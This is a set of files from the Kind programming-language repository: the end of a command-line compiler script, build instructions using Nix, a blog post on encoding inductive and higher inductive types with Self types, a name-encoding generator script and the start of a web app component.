console.log("Cannot compile a file (<main>.kind). Choose a term and try again.");
} else {
console.log("Compilation error.");
console.log(error);
}
}
(async () => {
var name = process.argv[2];
// FormCore compilation
if (process.argv[3] === "--fmc") {
console.log(await kind.run(kind["Kind.api.io.term_to_core"](name)));
// JavaScript compilation
} else if (process.argv[3] === "--js") {
var module = process.argv[4] === "--module";
try {
var fmcc = await kind.run(kind["Kind.api.io.term_to_core"](name));
try {
console.log(fmc_to_js.compile(fmcc, name, {module}));
} catch (e) {
throw "Couldn't find or compile term: '" + name + "'.";
}
} catch (e) {
display_error(name, e);
}
// Scheme compilation
} else if (process.argv[3] === "--scm") {
var module = process.argv[4] === "--module";
try {
var scm = await kind.run(kind["Kind.api.io.term_to_scheme"](name));
console.log(scm);
} catch (e) {
display_error(name, e);
}
// JavaScript execution
} else if (process.argv[3] === "--run") {
try {
var fmcc = await kind.run(kind["Kind.api.io.term_to_core"](name));
try {
var asjs = fmc_to_js.compile(fmcc, name, {});
} catch (e) {
throw "Couldn't find or compile term: '" + name + "'.";
}
var js_path = ".kind.tmp.js";
try { fs.unlinkSync(js_path); } catch (e) {};
fs.writeFileSync(js_path, asjs);
require(path.join(process.cwd(),js_path));
fs.unlinkSync(js_path);
} catch (e) {
display_error(name, e);
}
// Scheme execution
} else if (process.argv[3] === "--run-scm") {
try {
var scm = await kind.run(kind["Kind.api.io.term_to_scheme"](name));
var scm_path = ".kind.tmp.scm";
try { fs.unlinkSync(scm_path); } catch (e) {};
fs.writeFileSync(scm_path, scm);
console.log(exec("scheme --script "+scm_path).toString().slice(0,-1));
fs.unlinkSync(scm_path);
} catch (e) {
display_error(name, e);
}
// Lambda printing
} else if (process.argv[3] === "--show") {
try {
await kind.run(kind["Kind.api.io.show_term"](name));
} catch (e) {
display_error(name, e);
}
// Lambda evaluation
} else if (process.argv[3] === "--norm") {
try {
await kind.run(kind["Kind.api.io.show_term_normal"](name));
} catch (e) {
display_error(name, e);
}
// Haskell compilation
//} else if (process.argv[3] === "--hs") {
//var module = process.argv[4] === "--module" ? process.argv[5]||"Main" : null;
//try {
//var fmcc = await kind.run(kind["Kind.api.io.term_to_core"](name));
//console.log(fmc_to_hs.compile(fmcc, name, {module}));
//} catch (e) {
//display_error(name, e);
//}
// Type-Checking
} else {
try {
if (name[name.length - 1] === "/") {
var files = await find_kind_files(path.join(process.cwd(), name));
await kind.run(kind["Kind.api.io.check_files"](array_to_list(files)));
} else if (name.slice(-5) !== ".kind") {
await kind.run(kind["Kind.api.io.check_term"](name));
} else if (name) {
await kind.run(kind["Kind.api.io.check_file"](ADD_PATH + name));
}
} catch (e) {
console.log("Sorry, KindJS couldn't handle your input. :( ");
console.log("Try Haskell/Scheme releases!")
console.log(e);
}
}
})();
<file_sep>/INSTALL.md
# Scheme
The Scheme backend handles recursion better than the default JavaScript backend. That means it never overflows the stack, even in deep recursions.
# Prebuilt binaries
Kind is distributed as a single binary executable. You can download it [here](https://github.com/uwu-tech/Kind/releases).
# Building from source
**1.** There are many dependencies involved in building the Scheme release, and we use Nix to manage them. So first you need to install the [latest version](https://github.com/numtide/nix-unstable-installer) of Nix.
**2.** After installing Nix, enable the flakes feature by adding
```
experimental-features = nix-command flakes
```
to either `~/.config/nix/nix.conf` or `/etc/nix/nix.conf`. Restart your terminal for the change to take effect.
**3.** To build `kind-scm` navigate to the root of the repository and type
```
nix build .#kind-scm
```
Nix will build all the dependencies and place the executable inside the `result` folder. Subsequent builds will be much faster because the dependencies are already built.
If something doesn't work, [let us know](https://github.com/uwu-tech/Kind/issues) ;)
<file_sep>/blog/1-beyond-inductive-datatypes.md
Beyond inductive datatypes: exploring Self types
================================================
[Kind](https://github.com/uwu-tech/kind) is a **proof**gramming language that
can be used to define inductive datatypes and prove mathematical theorems by
induction, just like other proof assistants like Coq, Agda, Idris, Lean. Unlike
these, though, Kind doesn't include a complex native inductive datatype system.
Instead, it extends type-theory with a very simple primitive, `Self`, which
empowers the core language just enough to allow inductive datatypes to be
encoded with native lambdas. But can it go beyond? In this post, I present some
creative ways to use `Self` to implement "super inductive" datatypes that are simply
impossible in conventional proof assistants.
A quick recap of Self-Types in Kind
-----------------------------------
> Self-types can be described briefly. The dependent function type, `∀ (x : A) -> B(x)`
> allows the type returned by a function call, `f(x)`, to depend on the value of the
> argument, `x`. The self-dependent function type, `∀ f(x : A) -> B(f,x)` allows the
> type returned by a function call, `f(x)`, to also depend on the value of the function,
> `f`. That is sufficient to encode all the inductive datatypes and proofs present in
> traditional proof languages, as well as many other things.
To get started, let's recap how Self-Types work in Kind. Let's start by defining
the `Nat` type, a simple recursive function, and an inductive proof:
```javascript
// A Natural Number is either zero, or the successor of another Natural Number
type Nat {
zero
succ(pred: Nat)
}
// A recursive function that removes all `succ` constructors
destroy(a: Nat): Nat
case a {
zero: Nat.zero
succ: destroy(a.pred)
}
// An inductive proof that destroying a natural number results in zero
destroy_theorem(a: Nat): destroy(a) == 0
case a {
zero: refl
succ: destroy_theorem(a.pred)
}!
```
This should be familiar to a reader used to traditional proof assistants. For
comparison, here is the same program in Agda:
```agda
data Nat : Set where
zero : Nat
succ : (pred : Nat) -> Nat
destroy : Nat -> Nat
destroy zero = zero
destroy (succ pred) = destroy pred
destroy-theorem : (a : Nat) -> destroy(a) == 0
destroy-theorem zero = refl
destroy-theorem (succ pred) = destroy-theorem pred
```
The algorithms are the same. Under the hood, though, things are very different.
When you declare a datatype in Agda, it will add the constructors `zero` and
`succ` to the global scope. These constructors are atomic, they can't be broken
down into smaller pieces.
In `Kind`, something different happens: the `type` syntax is translated to
top-level definitions that represent the datatype using raw lambdas. Then, the
`case` expressions are translated to raw function applications. After this
"desugaring" process, the program above becomes:
```javascript
// Natural numbers
Nat: Type
self(P: Nat -> Type) ->
(zero: P(Nat.zero)) ->
(succ: (pred: Nat) -> P(Nat.succ(pred))) ->
P(self)
// The zero constructor of Nat
Nat.zero: Nat
(P, zero, succ) zero // same as: "λP. λzero. λsucc. zero"
// The succ constructor of Nat
Nat.succ(pred: Nat): Nat
(P, zero, succ) succ(pred) // same as: "λP. λzero. λsucc. (succ pred)"
// A recursive function that removes all `succ` constructors
destroy(a: Nat): Nat
a((a) Nat)(Nat.zero, (a.pred) destroy(a.pred))
// An inductive proof that destroying a natural number results in zero
destroy_theorem(a: Nat): destroy(a) == Nat.zero
a((a) destroy(a) == Nat.zero, refl, (a.pred) destroy_theorem(a.pred))
// Syntax notes:
// - "self(x: A) -> B" is a self-forall (self-dependent function type)
// - "(f, x) f(f(x))" is a lambda (as in, "λf. λx. (f (f x))")
// - "." is just a name-valid character (so "foo.bar" is just a name)
```
In other words, after parsing, the first program is exactly equivalent to this
one. If you wanted to, you could completely ignore the `type` / `case` syntaxes
and just encode your datatypes / pattern-matches with lambdas / applications
directly. Doing so will make your programs more verbose, but will grant you
the power to do things that were otherwise impossible. Let's explore some of
these possibilities now!
Possibility #0: smart constructors
----------------------------------
To motivate this example, let's port [Agda's `Int` type](https://github.com/agda/agda/blob/master/src/data/lib/prim/Agda/Builtin/Int.agda) to Kind:
```javascript
// Int.pos(n) represents +n
// Int.neg(n) represents -(n + 1)
type Int {
pos(nat: Nat)
neg(nat: Nat)
}
```
The idea is that an `Int` is either a positive `Nat` or a negative `Nat`. In
order to avoid having two zeros, the `neg` constructor starts as `-1`.
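For concreteness, here are a few values under this encoding (the definition
names below are just for illustration):
```javascript
plus_three: Int
  Int.pos(3)   // represents +3
int_zero: Int
  Int.pos(0)   // represents 0; there is no negative zero
minus_three: Int
  Int.neg(2)   // represents -(2 + 1) = -3
```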
This works, but it results in complex, confusing arithmetic functions, as we
have to carefully consider many combinations of signs. For example, here are `negate`
and `add`, ported from Agda:
```javascript
Int.negate(a: Int): Int
case a {
pos: case a.nat {
zero: Int.pos(Nat.zero)
succ: Int.neg(a.nat.pred)
}
neg: Int.pos(Nat.succ(a.nat))
}
Int.add(a: Int, b: Int): Int
case a b {
pos pos: Int.pos(Nat.add(a.nat, b.nat))
neg neg: Int.neg(Nat.succ(Nat.add(a.nat, b.nat)))
pos neg: if b.nat <? a.nat
then Int.pos((a.nat - b.nat) - 1)
else Int.neg(b.nat - a.nat)
neg pos: Int.add(Int.pos(b.nat), Int.neg(a.nat))
}
```
Disgusting, right? The odds that I've inverted a sign or introduced an off-by-one
error while porting this code are high, and I don't want to have to prove it correct either.
An alternative would be to represent an `Int` as a pair of two `Nat`s, and the
integer is represented by the first natural number subtracting the second
natural number.
```javascript
// Int.new(a, b) represents `a - b`
type Int {
new(pos: Nat, neg: Nat)
}
```
In this representation, algorithms become very simple. For example, we could
negate an `Int` by just swapping its components, and we could add two `Int`s by
adding each component:
```javascript
Int.neg(a: Int): Int
case a {
new: Int.new(a.neg, a.pos)
}
Int.add(a: Int, b: Int): Int
case a b {
new new: Int.new(Nat.add(a.pos, b.pos), Nat.add(a.neg, b.neg))
}
```
This is beautiful. But while this type is great for algorithms, it
breaks theorem proving. That's because there are multiple representations of the
same integer. For example, `3` can be written as `Int.new(3, 0)`, `Int.new(4,
1)`, `Int.new(5, 2)` and so on. This is bad. We could solve this issue by adding
an extra field enforcing that either `pos` or `neg` is `zero`:
```javascript
// Int.new(a, b) represents `a - b`
type Int {
new(pos: Nat, neg: Nat, eq: Either(Equal(Nat,pos,0), Equal(Nat,neg,0)))
}
```
This would be technically correct, but algorithms would become considerably
worse, as we'd need to prove that `eq` still holds every time we construct an
`Int`. This is terrible. What if we could, instead, have an `Int.new`
constructor that automatically "canonicalized itself", such that
`Int.new(5, 2)` **reduced to** `Int.new(3, 0)`, making both equal
**by definition**?
A friend of mine, <NAME>, has some unpublished work, where he uses this
idea, which he calls "inductive types with conditions", to encode higher
inductive types (HITs) and the cubical path type. I'm a simpler person, so I just
call this "smart constructors". The concept is implemented in the Arend language
with a nice syntax, and the idea was invented independently by me and the
language authors.
Kind doesn't have a nice syntax for smart constructors yet. But the surprising
fact is we can still encode them by "hacking" the Self encodings generated by
the parser! Let's start by asking Kind to display the self-encoding of `Int`
with `kind Int --show`:
```javascript
Int: Type
self(P: Int -> Type) ->
(new: (pos:Nat) -> (neg:Nat) -> P(Int.new(pos,neg))) ->
P(self)
Int.new(pos: Nat, neg: Nat): Int
(P, new) new(pos, neg)
```
As you can see, the `Int.new` constructor isn't an atomic value, but instead, it
is just a regular definition. Does that mean we can add computations inside that
definition? Sure! And that is exactly what we are going to do:
```javascript
Int.new(pos: Nat, neg: Nat): Int
(P, new)
case pos {
zero: new(Nat.zero, neg) // halts
succ: case neg {
zero: new(Nat.succ(pos.pred), Nat.zero) // halts
succ: Int.new(pos.pred, neg.pred)(P, new) // recurses
}!
}: P(Int.new(pos, neg))
```
This new "smart constructor" does exactly what it should, decreasing both values
recursively until one of them is zero. It is as if we wrote this hypothetical
syntax:
```javascript
type Int {
new(pos: Nat, neg: Nat) with {
zero zero: new(zero, zero) // halts
zero succ: new(zero, succ(neg.pred)) // halts
succ zero: new(succ(pos.pred), zero) // halts
succ succ: Int.new(pos.pred, neg.pred) // recurses
}
}
```
And, yes: it just works! Different ways to represent the same number become
equal by definition. So, for example, we can prove that `Int.new(5, 2) ==
Int.new(3, 0)` with just `refl`:
```javascript
same: Int.new(5, 2) == Int.new(3, 0)
refl
```
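The `refl` goes through because the constructor itself normalizes both sides to
the same term. Sketching the reduction steps:
```javascript
// Int.new(5, 2)        // both components are succ, so it recurses
// ~> Int.new(4, 1)     // still both succ, recurses again
// ~> Int.new(3, 0)     // neg reached zero: halts; this is the canonical form
```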
And the algorithms become as clean as you'd expect. Check them on the
[Kind/base/Int](https://github.com/uwu-tech/Kind/tree/master/base/Int)
directory!
This idea, I believe, can be generalized to represent quotient types; see Aaron
Stump's [Quotients by Idempotent Functions in
Cedille](https://homepage.cs.uiowa.edu/~cwjnkins/assets/MJS19_Quotients-Idempotent-Functions-Cedille.pdf).
Possibility #1: conditional constructors
----------------------------------------
*Edit: after thinking about it, this isn't different from just functions that
return types, which conventional proof languages can do just fine. But I'll
leave it here because it is still useful information. Go ahead to the next
section if you just want to explore self types.*
In [this paper](https://arxiv.org/pdf/2103.15408.pdf), <NAME> (again!)
proposes a different encoding of indexed datatypes. He starts by presenting the
usual definition of `Vector` in Agda:
```agda
data Vector (A : Type) : (len : Nat) -> Type where
vnil : Vector A zero
vcons : (len : Nat) -> (head : A) -> (tail : Vector A len) -> Vector A (succ len)
```
And then proposes, instead, a definition that, adapted, looks like this:
```agda
data Vector (A : Type) (len : Nat) : Type
| A zero => vnil
| A (succ pred) => vcons (head : A) (tail : Vector A pred)
```
What this is saying is that the very shape of a Vector depends on the value
of `len` (its length). A Vector with length `0` has only one constructor:
`vnil`. A Vector with length `succ(n)` has also only one constructor: `vcons`,
with a `head` and a `tail`. Tesla argues this is an easier way to implement
indexed datatypes since it doesn't require dealing with indices. For Kind, that
isn't relevant, as we already have inductive datatypes from `Self` (which, I
argue, is even easier to implement). But this encoding has another benefit:
pattern-matching only demands the required cases. If you pattern-match a vector
with `len > 0`, you don't need to provide the `nil` case at all, which is very
convenient as you don't need to prove it is unreachable. Of course, if the `len`
is unknown, then you won't be able to pattern-match it at all until you
pattern-match on the `len` itself.
How can we do it with `Self` types? Let's start defining the conventional
indexed `Vector` datatype, using the built-in syntax.
```javascript
type Vector (A: Type) ~ (len: Nat) {
nil ~ (len = Nat.zero)
cons(len: Nat, head: A, tail: Vector(A,len)) ~ (len = Nat.succ(len))
}
```
This has the same information as Agda's definition, although with a slightly
different syntax. We can ask Kind to display its self-encoding by typing `kind
Vector --show` on the terminal. The result, adapted for readability, is:
```javascript
Vector(A: Type, len: Nat): Type
self(P: Nat -> Vector(A,len) -> Type) ->
(nil: P(0, nil(A))) ->
(cons: (len: Nat) -> (head: A) -> (tail: Vector(A,len)) -> P(Nat.succ(len), cons(A,len,head,tail))) ->
P(len, self)
nil(A: Type): Vector(A, Nat.zero)
(P, nil, cons) nil
cons(A: Type, len: Nat, head: A, tail: Vector(A, len)): Vector(A, Nat.succ(len))
(P, nil, cons) cons(len,head,tail)
```
This isn't very easy to read, but you don't need to understand how this
translation works. The only thing that matters is that `Vector` is, again, just
a regular definition, so we can "hack" it too by adding a computation inside:
```javascript
Vector(A: Type, len: Nat): Type
case len {
zero:
self(P: (self: Vector(A,0)) Type) ->
(nil: P(nil(A))) ->
P(self)
succ:
self(P: (self: Vector(A,Nat.succ(len.pred))) Type) ->
(cons: (head: A) -> (tail: Vector(A, len.pred)) -> P(cons(A,len.pred,head,tail))) ->
P(self)
}
nil(A: Type): Vector(A, 0)
(self, nil) nil
cons(A: Type, len: Nat, head: A, tail: Vector(A, len)): Vector(A, Nat.succ(len))
(self, cons) cons(head, tail)
```
Here, we pattern-match on `len` inside of the `Vector` definition, in order to
return two different types. When `len` is zero, `Vector` becomes a datatype with only
the `nil` constructor. When `len` is `succ(n)`, it becomes a datatype with only
the `cons` constructor. It is as if we wrote this hypothetical syntax:
```javascript
type Vector(A: Type, len: Nat) {
case len {
zero: nil
succ: cons(head: A, tail: Vector(A, len.pred))
}
}
```
Is that enough to implement Tesla's datatypes? Yes, and it behaves exactly as
expected! We can construct Vectors using `cons`:
```javascript
my_vec: Vector(Nat, 3)
cons!!(100, cons!!(200, cons!!(300, nil!)))
```
And we can destruct using the `case` syntax, which will work since the
desugaring is the same:
```javascript
head(A: Type, len: Nat, vec: Vector(A, Nat.succ(len))): A
case vec {
cons: vec.head
}
```
The `head` function magically type-checks with only the `cons` case, because
Kind knows that the `len` is not `0`. If the length of the vector were unknown:
```javascript
head(A: Type, len: Nat, vec: Vector(A, len)): Maybe(A)
case vec {
nil: ?a
cons: ?b
}: A
```
Kind would complain that it can't infer the type of `case`. We can't
pattern-match on `vec` in the body of `head` at all. But we can if we
pattern-match on `len` first and then specialize the type of `vec` with `with`:
```javascript
head(A: Type, len: Nat, vec: Vector(A, len)): Maybe(A)
case len with vec {
zero: case vec {
nil: none
}
succ: case vec {
cons: some(vec.head)
}
}!
```
Kind graciously demands only the `nil` case on the `zero` branch and only the
`cons` case on the `succ` branch!
To be honest, I'm surprised it works so well, given that I wasn't even
aware of this encoding when I implemented the language. In the future, I may
update Kind to incorporate Tesla's syntax for this kind of datatype, but the
fact that you can already do that by manually tweaking the Self-encodings is
beautiful.
Possibility #2: first-class modules
-----------------------------------
Check [this post](https://github.com/uwu-tech/Kind/blob/master/blog/2-first-class-modules-with-self-types.md)
for a simple encoding of first-class modules with self types.
Possibility #3: higher inductive types
--------------------------------------
From ncatlab, *"Higher inductive types (HITs) are a generalization of inductive
types which allow the constructors to produce, not just points of the type being
defined, but also elements of its iterated identity types."* In simpler words,
it is as if a datatype could have constructors with types that aren't
necessarily the same as the type being defined, but, instead, equalities. For
example, we could define a type for "unordered pairs" as:
```agda
data UnordPair (A : Set) : Set where
make : (a : A) -> (b : A) -> UnordPair A
swap : make a b == make b a
```
This pair type has an extra constructor, `swap`, that enforces that `(a,b) ==
(b,a)`. Because of that, whenever we pattern-match on `UnordPair`, we must prove
that the result will not depend on the order of the arguments. As such, it is
impossible to, for example, write the function "first" for it; after all, there
is no such a thing as the first element of an unordered pair. But it is possible
to write the function "sum", because `a + b == b + a`, so the order doesn't
matter when adding both values.
Can we encode `UnordPair` with Self? Well yes, but actually no. Let's start by
encoding it without the `swap` constructor:
```javascript
UPair(A: Type): Type
self(P: UPair(A) -> Type) ->
(make: (a: A) -> (b: A) -> P(UPair.make(A, a,b))) ->
P(self)
UPair.make(A: Type, a: A, b: A): UPair(A)
(P, make) make(a, b)
```
This is just a regular pair. Now, let's try to hack it again and add the swap
constructor:
```javascript
UPair(A: Type): Type
self(P: UPair(A) -> Type) ->
(make: (a: A) -> (b: A) -> P(UPair.make(A, a,b))) ->
(swap: (a: A) -> (b: A) -> Equal(_, make(a,b), make(b,a))) ->
P(self)
UPair.make(A: Type, a: A, b: A): UPair(A)
(P, make, swap) make(a, b)
```
As you can see, all we did was add a new constructor, `swap`, that returns an
`Equal(...)` instead of a `P(...)`. That constructor is supposed to, whenever we
pattern-match an `UPair`, demand a proof that the value returned by the `make`
branch doesn't depend on the order of `a` and `b`. Does that work? No! That's
because Kind doesn't have heterogeneous equality, and `make(a,b)` and
`make(b,a)` have different types (`P(UPair.make(A, a,b))` and
`P(UPair.make(A, b,a))`). We can make it work, though, if we create a
non-inductive version of UPair:
```javascript
UPair(A: Type): Type
self(P: Type) ->
(make: (a: A) -> (b: A) -> P) ->
(swap: (a: A) -> (b: A) -> Equal(P, make(a,b), make(b,a))) ->
P
UPair.make(A: Type, a: A, b: A): UPair(A)
(P, make, swap) make(a, b)
```
This definition allows us to create unordered pairs, and we can pattern-match on
them, as long as the result doesn't depend on the order of the elements. For
example, we can return a constant:
```javascript
Test: Nat
let upair = UPair.make!(1, 2)
case upair {
make: 4
swap: refl
}
```
And we can add both elements:
```javascript
Test: Nat
let upair = UPair.make!(1, 2)
case upair {
make: upair.a + upair.b
swap: Nat.add.comm(upair.a, upair.b)
}
```
But we can't get the first element:
```javascript
Test: Nat
let upair = UPair.make!(1, 2)
case upair {
make: upair.a
swap: ?a
}
```
As that would demand a proof that `1 == 2`.
While this kinda works, we can't prove the induction principle for `UPair`s,
because we had to make the Self-encoding non-inductive due to the lack of
heterogeneous equality. Moreover, even if we could, we'd still not be able to
prove that `UPair.make!(a,b) == UPair.make!(b,a)` because the language lacks
`funext`. If we did have both heterogeneous equality and funext, though, then
we'd be able to encode higher inductive types as done in cubical languages. It
is an open problem to have these without huge structural changes on Kind's core
language. If you have any clue on how that could be done, please let me know!
Possibility #4: intervals and paths
-----------------------------------
The main insight is that we can encode the Interval type and the Path type as
Self-encodings that refer to each other. The Interval type is like a boolean,
but with an extra constructor of type `i0 == i1` forcing that, in order to
eliminate an interval, both cases must be equal. The Path type proposes that
two values `a, b : A` are equal if there exists a function `t : I -> A` such
that `t(i0) = a` and `t(i1) = b`. In other words, it is the equivalent of:
```agda
data I : Set where
i0 : I
i1 : I
ie : Path A i0 i1
data Path (A: I -> Set) : (A i0) -> (A i1) -> Set where
abs : (t : (i: I) -> A i) -> Path A (t i0) (t i1)
```
Here it is:
```javascript
// The Interval type:
// Γ ⊢
// ------------
// Γ ⊢ I : Type
I: Type
i(P: I -> Type) ->
(i0: P(i0)) ->
(i1: P(i1)) ->
(ie: Path(P, i0, i1)) ->
P(i)
// The i0 interval:
// Γ ⊢
// ----------
// Γ ⊢ i0 : I
i0: I
(P, i0, i1, ie) i0
// The i1 interval:
// Γ ⊢
// ----------
// Γ ⊢ i1 : I
i1: I
(P, i0, i1, ie) i1
// Interval equality:
// Γ ⊢
// -----------------
// Γ ⊢ ie : i0 == i1
ie: Path((i) I, i0, i1)
(P, abs) abs((i) i)
// The Path type:
// Γ, i : Type ⊢ A(i) : Type
// Γ ⊢ a : A(i)
// Γ ⊢ b : A(i)
// -------------------------------
// Γ ⊢ Path(A, a, b) : Type
Path(A: I -> Type, a: A(i0), b: A(i1)) : Type
path(P: (a: A(i0)) -> (b: A(i1)) -> Path(A, a, b) -> Type) ->
(abs: (t: (i:I) -> A(i)) -> P(t(i0), t(i1), Path.abs(A, t))) ->
P(a, b, path)
// Path abstraction:
// Γ ⊢ A Γ, i : I ⊢ t : A
// ---------------------------------
// Γ ⊢ (i) t : Path(A, t(i0), t(i1))
Path.abs (A: I -> Type) (t: (i:I) -> A(i)): Path(A, t(i0), t(i1))
(P, abs) abs(t)
// Path application:
// Γ ⊢ e : Path(A, a, b)
// Γ ⊢ i : I
// ---------------------
// Γ ⊢ e(i) : A
app(A: I -> Type, a: A(i0), b: A(i1), e: Path(A, a, b), i: I): A(i)
i(A, a, b, e)
// Path left:
// Γ ⊢ a : A
// Γ ⊢ b : B
// Γ ⊢ e : Path A a b
// --------------------------
// Γ ⊢ p0(a,b,e) : e(i0) == a
p0(A: Type, a: A, b: A, P: A -> Type, e: Path((i) A,a,b), p: P(app((i) A,a,b,e,i0))): P(a)
e((x, y, e) P(app((i) A,x,y,e,i0)) -> P(x), (t) (p) p, p)
// Path right:
// Γ ⊢ A : Type
// Γ ⊢ a : A
// Γ ⊢ b : B
// Γ ⊢ e : Path A a b
// --------------------------
// Γ ⊢ p1(a,b,e) : e(i1) == b
p1(A: Type, a: A, b: A, P: A -> Type, e: Path((i) A,a,b), p: P(app((i) A,a,b,e,i1))): P(b)
e((x, y, e) P(app((i) A,x,y,e,i1)) -> P(y), (t) (k) k, p)
// Path reflexivity:
// refl : ∀ {ℓ} {A : Set ℓ} {x : A} → Path A x x
// refl {x = x} = λ i → x
refl(A: Type, x: A): Path((i) A, x, x)
(P, abs) abs((i) x)
// Path congruence:
// cong : ∀ {ℓ} {A : Set ℓ} {x y : A} {B : A → Set ℓ} (f : (a : A) → B a) (p : x ≡ y) → PathP (λ i → B (p i)) (f x) (f y)
// cong f p i = f (p i)
cong
(A: Type) ->
(B: A -> Type) ->
(x: A) ->
(y: A) ->
(f: (a: A) -> B(a)) ->
(p: Path((i) A, x, y)) ->
: Path((i) B(app((i) A, x, y, p, i)), f(x), f(y))
(P, abs) abs((i) f(app((i) A, x, y, p, i)))
// Path symmetry: (TODO: depends on `neg`)
// sym : ∀ {ℓ} {A : Set ℓ} {x y : A} → x ≡ y → y ≡ x
// sym p = λ i → p (~ i)
// Examples
type Bool {
true
false
}
// We can prove that `true = true` by using a constant
tt0: Path((i) Bool, Bool.true, Bool.true)
Path.abs((i) Bool, (i) Bool.true)
// We can prove that `true = true` by pattern-matching
tt1: Path((i) Bool, Bool.true, Bool.true)
Path.abs((i) Bool, (i)
case i {
i0: Bool.true
i1: Bool.true
ie: refl<Bool>(Bool.true)
}
// We can't prove that `true = false`!
// The fact that the images of two equal elements are equal:
// Γ ⊢ a : A
// Γ ⊢ b : A
// Γ ⊢ f : A → B
// Γ ⊢ p : Path A a b
// -------------------------------------
// Γ ⊢ Path.abs((i) f (p i)) : Path B (f a) (f b)
img(A: Type, B: Type, a: A, b: A, f: A -> B, p: Path((i) A, a, b)): Path((i) B, f(a), f(b))
Path.abs((i) B, (i) f(app((i) A,a,b,p,i)))
// Function extensionality:
// Note that this is eta-expanded as `(x) f(x) = (x) g(x)` because Formality
// doesn't eta-reduce for performance and code-simplicity reasons, but this
// could easily be added to the language to have `f = g`.
funext
(A: Type) ->
(B: A -> Type) ->
(f: (x: A) -> B(x)) ->
(g: (x: A) -> B(x)) ->
(h: (x: A) -> Path((i) B(x), f(x), g(x))) ->
: Path((i) (x: A) -> B(x), (x) f(x), (x) g(x))
Path.abs((i) (x:A) -> B(x))((i) (x) app((i) B(x), f(x), g(x), h(x), i))
```
Sadly, while we can prove `funext` for this type, we can't prove `transp`, even
though it is true. Finding a simple way to extend Kind's core language to allow
`transp` to be proved internally is another open problem.
<file_sep>/base/Kind/Name/generate_conversors.js
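// Generates Kind source code for converting between names and their bit-string
// encodings (the generated snippets reference Kind.Name.from_bits and
// Kind.Name.to_bits). Each name character corresponds to 6 bits, as given by the
// table below; the output is printed to stdout, presumably to be pasted into the
// corresponding definitions in base/Kind/Name.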
var table = {
'A': '000000', 'B': '100000', 'C': '010000', 'D': '110000',
'E': '001000', 'F': '101000', 'G': '011000', 'H': '111000',
'I': '000100', 'J': '100100', 'K': '010100', 'L': '110100',
'M': '001100', 'N': '101100', 'O': '011100', 'P': '111100',
'Q': '000010', 'R': '100010', 'S': '010010', 'T': '110010',
'U': '001010', 'V': '101010', 'W': '011010', 'X': '111010',
'Y': '000110', 'Z': '100110', 'a': '010110', 'b': '110110',
'c': '001110', 'd': '101110', 'e': '011110', 'f': '111110',
'g': '000001', 'h': '100001', 'i': '010001', 'j': '110001',
'k': '001001', 'l': '101001', 'm': '011001', 'n': '111001',
'o': '000101', 'p': '100101', 'q': '010101', 'r': '110101',
's': '001101', 't': '101101', 'u': '011101', 'v': '111101',
'w': '000011', 'x': '100011', 'y': '010011', 'z': '110011',
'0': '001011', '1': '101011', '2': '011011', '3': '111011',
'4': '000111', '5': '100111', '6': '010111', '7': '110111',
'8': '001111', '9': '101111', '.': '011111', '_': '111111',
};
for (var key in table) {
table[table[key]] = key;
}
function sp(tab) {
return tab === 0 ? "" : " " + sp(tab - 1);
}
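// Emits a nested `case` expression that consumes the bit-string 6 bits at a
// time and maps each 6-bit group back to its character (bits -> name direction).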
function go(bs, tab=0, depth=0, prev="") {
var name = "bs";
if (depth === 6) {
let chr = table[bs.split("").reverse().join("")];
console.log(sp(tab) + prev + "String.cons('"+chr+"',Kind.Name.from_bits(bs))");
} else {
console.log(sp(tab) + prev + "case " + name + " {");
console.log(sp(tab+2) + "E: String.nil");
go(bs+"0", tab+2, depth+1, "O: let bs = bs.pred; ");
go(bs+"1", tab+2, depth+1, "I: let bs = bs.pred; ");
console.log(sp(tab) + "}");
}
};
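// Emits a chain of nested `if U16.ltn(...)` tests (a binary search over the
// character-code range [i, j)) that produces the 6-bit encoding of each
// character (name -> bits direction).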
function og(bs, i, j, tab=0, prev="") {
if (j - i <= 1) {
//var text = "E";
//for (var i = bs.length - 1; i >= 0; --i) {
//text = bs[i] === "0" ? "O("+text+")" : "I("+text+")";
//}
var chr = String.fromCharCode(i);
var bts = table[chr].split("").reverse().join("");
var txt = "Kind.Name.to_bits(name.tail)";
for (var i = bts.length - 1; i >= 0; --i) {
txt = bts[i] === "0" ? "O("+txt+")" : "I("+txt+")";
}
console.log(sp(Math.max(tab-2,0)) + prev + txt);
} else {
console.log(sp(Math.max(tab-2,0)) + prev + "if U16.ltn(x,"+Math.floor((j+i)/2)+"#16)");
og(bs+"0", i, Math.floor((j+i)/2), tab+2, "then ");
og(bs+"1", Math.floor((j+i)/2), j, tab+2, "else ");
}
};
//. : 46
//0-9 : 48-57
//A-Z : 65-90
//_ : 95
//a-z : 97-122
console.log(" if U16.ltn(x,47#16) then");
og("", 46, 47, 6);
console.log(" else if U16.ltn(x,58#16) then");
og("", 48, 58, 6);
console.log(" else if U16.ltn(x,91#16) then");
og("", 65, 91, 6);
console.log(" else if U16.ltn(x,96#16) then");
og("", 95, 96, 6);
console.log(" else");
og("", 97, 123, 6);
<file_sep>/base/User/maisa/bytes.md
# Bytes
Reference: https://docs.ethers.io/v5/api/utils/bytes/#Bytes
- A Bytes is any object which is an Array or TypedArray with each value in the valid byte range (i.e. between 0 and 255 inclusive), or is an Object with a length property where each indexed property is in the valid byte range.
#### Note:
- All JavaScript numbers are 64-bit floating-point numbers
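A minimal check following the definition above could look like this (a sketch
for illustration only; `isBytes` here is not the ethers.js API):
```js
// True if `value` is array-like with a numeric length and every indexed entry
// is an integer in the range 0..255.
function isBytes(value) {
  if (value == null || typeof value.length !== "number") return false;
  for (let i = 0; i < value.length; i++) {
    const v = value[i];
    if (typeof v !== "number" || !Number.isInteger(v) || v < 0 || v > 255) return false;
  }
  return true;
}
```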
<file_sep>/web/src/AppPlay.js
const { Component, render } = require("inferno");
const h = require("inferno-hyperscript").h;
const apps = require("./apps/index.js");
const ethsig = require("nano-ethereum-signer");
const utils = require("./utils.js");
const StateList = require("./StateList.js");
const DEBUG_SHOW_FPS = false;
module.exports = class AppPlay extends Component {
// Sets up internal variables
constructor(props) {
super(props);
this.name = props.name; // name of this application
this.app = null; // application module, compiled from Kind
this.app_state = null; // the state of the application
this.app_global_states = null; // previous global states
this.app_global_tick = null; // global tick we're at
this.app_global_begin = null; // the first tick of this app
this.app_global_posts = {}; // map of global posts
this.app_has_ticker = false; // is there a tick function?
this.received_posts = []; // list of posts in received order
this.display = null; // message to display (overrides render)
this.watching = {}; // rooms I'm watching
this.intervals = {}; // timed intervals
this.listeners = {}; // event listeners
this.mouse_pos = { _: "Pair.new", fst: 0, snd: 0 };
this.rendered = null; // document rendered by app, coming from Kind
this.container = props.container; // container that holds rendered app
